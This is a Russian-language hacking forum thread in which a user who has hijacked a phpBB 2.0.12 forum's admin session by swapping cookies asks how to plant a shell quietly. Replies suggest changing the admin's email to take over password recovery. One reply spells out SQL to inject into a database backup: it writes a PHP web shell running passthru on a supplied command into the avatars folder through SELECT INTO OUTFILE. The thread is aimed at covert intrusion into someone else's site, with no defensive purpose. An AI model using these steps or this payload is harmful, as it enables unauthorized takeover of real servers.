![]() |
Способы заливки шелла в phpBB 2.0.12
Получил права админа подменой кукисов, и че дальше сделать? База не сливается, не одна известная иньекция не помогает которые я пробывал, ни один сплойт с удаленными командами не работает. Люди скажите хотя бы как мне получить хеш админа? Или посоветуйте какой-нить сплойт? А может можно какими-то обходными путями залить шелл?
|
Может, чуть-чуть подробнее ситуацию опишешь, какой форум... и т.д...
|
phpbb 2.0.12, че еще подробнее? Именно?
|
хы, если кукисы=пасс от админки в мд5, то еще что-то сделать можно. но похоже это не так, т.е тебе нужно достать настоящий пасс.. мде, почему то именно сейчас в голову пришла неплохая мысль.. :p берешь в профайле меняешь мыло админа на свое, и ретривишь пароль на то мыло, которое указал.. ы черт, чтож я раньше не допер :D мыло админа только не забудь записать, чтоб обратно поменять.. жаль что пасс обратно нельзя будет поставить (например, если ипб, то с помощью бд хоть и сам хеш вставишь, а соль фигушки)..
|
нет...погоди...так, а ты непробовал шелл залить или "сделать его"... ну типа в админке есть меню, я уж не помню, типа сохранить БД, вот сохраняешь её... открываешь блокнотом, или лучше Bredo'm и исчешь вот это:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10'); Если нашёл, то заменяешь вот на это... INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10'); SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; А потом из этого же меню в админке востанавливаешь БД и указываешь путь к только, что исправленной БД. Этот путь которой указан выше, от случая к случаю... там будет осоздан обычный шелл...а там обращаешь с нему с просьбой выпонить тебе команду....вот и всё... |
c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.
|
Dr.Check Я же написал что базу слить не могу....
|
Цитата:
|
c411k А мне палево не надо, тогда он везде пасс сменить, и шеллы начнет искать, и баста карапузики ;) Все нужно делать тихо.....
|
и загрузить тоже не чего нельзя чтоль?
|
| Время: 19:58 |